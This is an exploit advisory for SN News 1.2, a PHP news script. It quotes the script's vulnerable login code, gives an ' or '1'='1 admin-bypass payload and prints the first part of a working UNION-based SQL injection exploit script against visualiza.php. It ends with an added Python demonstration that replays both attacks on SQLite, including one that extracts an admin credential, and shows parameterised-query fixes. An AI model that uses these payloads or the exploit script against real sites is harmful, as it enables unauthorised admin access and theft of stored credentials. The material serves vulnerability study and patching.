
SN News <= 1.2 admin authentication bypass and SQL injection vulnerability warning - Hackbase (黑吧安全网)

Description

SN News <= 1.2 (/admin/loger.php) Admin Bypass / Remote SQL Injection Vulnerability
Affected version: 1.2
Download address: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
The author is not responsible for any harm caused by this information.

##############################################################################
## The defect is located in /admin/logar.php, lines 4-15:

```php
 4. $login = $_POST["login"];
 5. $senha = $_POST["senha"];
 6. $sql = "select * from news_adm where login='$login' AND senha='$senha'";
 7. $query = mysql_query($sql);
 8. $nr = mysql_num_rows($query);
 9. if($nr>0){
10.     $_SESSION["admin"] = "on";
11.     echo "<script>
12.     location.href='../'
13.     </script>
14.     ";
15. }
```

## Comment:
## As you can see there is no validation or filtering of the variables $login and $senha
## (senha = password) before they are concatenated into the query on line 6, so an
## attacker controls the SQL sent to mysql_query() through either variable. The only
## check is mysql_num_rows() > 0, so any input that makes the WHERE clause true for
## at least one row grants the admin session.
##
## SQL Injection PoC:
## http://www.xxx.com/sn_news/admin/login.htm
## Login: 'or '1'='1
## Senha: 'or '1'='1
## The resulting query is
## select * from news_adm where login='' or '1'='1' AND senha='' or '1'='1'
## which matches every row, so this injection bypasses the admin login screen.

# Title: SN News <= 1.2 SQL Injection

The exploit below targets a second injection point, visualiza.php?id=, with a UNION-based query. It wraps the values it wants to read (user() and version()) in a random token passed as a hex literal, so no quotes are needed in the payload, and then pulls them back out of the response with a regular expression. The script is cut off here and continues on the next page of this advisory.

```php
<?php
/*
Example:
$ php mnews.php http://www.xxx.com/scripts/mnews/
*/
error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

// Encode a string as a MySQL hex literal (0x...) so it can be used without quotes.
function hex($string){
    $hex = ""; // PHP 'Dim' =]
    for ($i = 0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x' . $hex;
}

echo "\nSN News <= 1.2 SQL Injection exploit\n";
echo "Discovered and written by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n";

if($argc != 2) {
    echo "Usage: \n";
    echo "php $argv[0] <target url>\n";
    echo "Example:\n";
    echo "php $argv[0] http://www.website.com/snnews\n";
    exit;
}

$target = $argv[1];
if(substr($target, (strlen($target) - 1)) != "/") {
    $target .= "/";
}

// Close the quoted id value and append the UNION; the trailing "-- " comments out the rest.
$inject = $target . "visualiza.php?id=-0'%20";
$token = uniqid();
$token_hex = hex($token);

echo "[*] Trying to get informations...\n";
$infos = file_get_contents($inject . urlencode("union all select 1,concat(" . $token_hex . ", user(), " . $token_hex . ", version(), " . $token_hex . "), 3,4,5-- "));
$infos_r = array();
// The token delimits the injected values inside the returned HTML.
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
$user = $infos_r[1][0];
$version = $infos_r[2][0];
```

[continued on page 2: 34103_2.htm]
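The following is an added example, not code from the advisory or from SN News: it replays both injection points described above (the login bypass in logar.php and the token-delimited UNION extraction against visualiza.php) against an in-memory SQLite copy of the schema, and shows the parameterised fix beside each. The news table columns, the sample rows and the shape of visualiza.php's query are assumptions for illustration; only news_adm.login, news_adm.senha and the id parameter come from the advisory. sqlite_version() stands in for MySQL's version(), and the token is passed as a quoted string because SQLite has no 0x string literals.

```python
"""Added example (not from the advisory or SN News): the logar.php login bypass and
the visualiza.php UNION extraction replayed against SQLite, with the fix for each.
Everything except news_adm.login, news_adm.senha and the id parameter is assumed."""
import re
import sqlite3
import uuid


def make_db():
    """Constructed sample data: one admin row and one news item (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news_adm (id INTEGER PRIMARY KEY, login TEXT, senha TEXT)")
    conn.execute("INSERT INTO news_adm (login, senha) VALUES ('admin', 'S3cret!')")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, titulo TEXT, texto TEXT, autor TEXT, data TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'Hello', 'First post', 'editor', '2010-01-01')")
    conn.commit()
    return conn


def vulnerable_login(conn, login, senha):
    """Mirrors logar.php lines 4-9: raw POST values interpolated into the query."""
    sql = f"select * from news_adm where login='{login}' AND senha='{senha}'"
    return len(conn.execute(sql).fetchall()) > 0


def safe_login(conn, login, senha):
    """Same check with bound parameters: quotes in the input stay data, not SQL."""
    sql = "select * from news_adm where login=? AND senha=?"
    return len(conn.execute(sql, (login, senha)).fetchall()) > 0


def _render(rows):
    """Stand-in for the HTML the page would emit: every column of every row."""
    return "\n".join(" | ".join(str(col) for col in row) for row in rows)


def vulnerable_visualiza(conn, id_param):
    """Assumed shape of visualiza.php: five columns selected by a quoted, unfiltered id."""
    sql = f"select id,titulo,texto,autor,data from news where id='{id_param}'"
    return _render(conn.execute(sql).fetchall())


def safe_visualiza(conn, id_param):
    """Fix: an article id must be an integer; reject anything else, then bind it."""
    try:
        news_id = int(id_param)
    except ValueError:
        return ""
    rows = conn.execute("select id,titulo,texto,autor,data from news where id=?", (news_id,)).fetchall()
    return _render(rows)


def union_extract(page):
    """The exploit's technique: UNION in a row whose second column carries
    attacker-chosen values wrapped in a random token, then pull them back out of
    the response with a regex. Returns None when the page does not echo the token."""
    tok = uuid.uuid4().hex
    # sqlite_version() replaces MySQL's version(); the scalar subselect dumps the
    # first admin credential, which is what an attacker would go for next.
    payload = (
        f"-0' union all select 1, '{tok}' || sqlite_version() || '{tok}' || "
        f"(select login || ':' || senha from news_adm limit 1) || '{tok}', 3, 4, 5-- "
    )
    m = re.search(f"{tok}(.*?){tok}(.*?){tok}", page(payload))
    if m is None:
        return None
    return {"version": m.group(1), "credential": m.group(2)}


if __name__ == "__main__":
    db = make_db()
    print("login bypass (vulnerable):", vulnerable_login(db, "' or '1'='1", "' or '1'='1"))
    print("login bypass (fixed)     :", safe_login(db, "' or '1'='1", "' or '1'='1"))
    print("union leak (vulnerable)  :", union_extract(lambda i: vulnerable_visualiza(db, i)))
    print("union leak (fixed)       :", union_extract(lambda i: safe_visualiza(db, i)))
```

Binding the parameters is what closes both holes; casting the id to an integer is the extra check that belongs on visualiza.php because the value is only ever a number. Note that the bypass still works on the vulnerable login with the password stored in clear text, as the advisory's code implies; hashing senha and comparing with a constant-time check is a separate fix that the parameterised query does not replace.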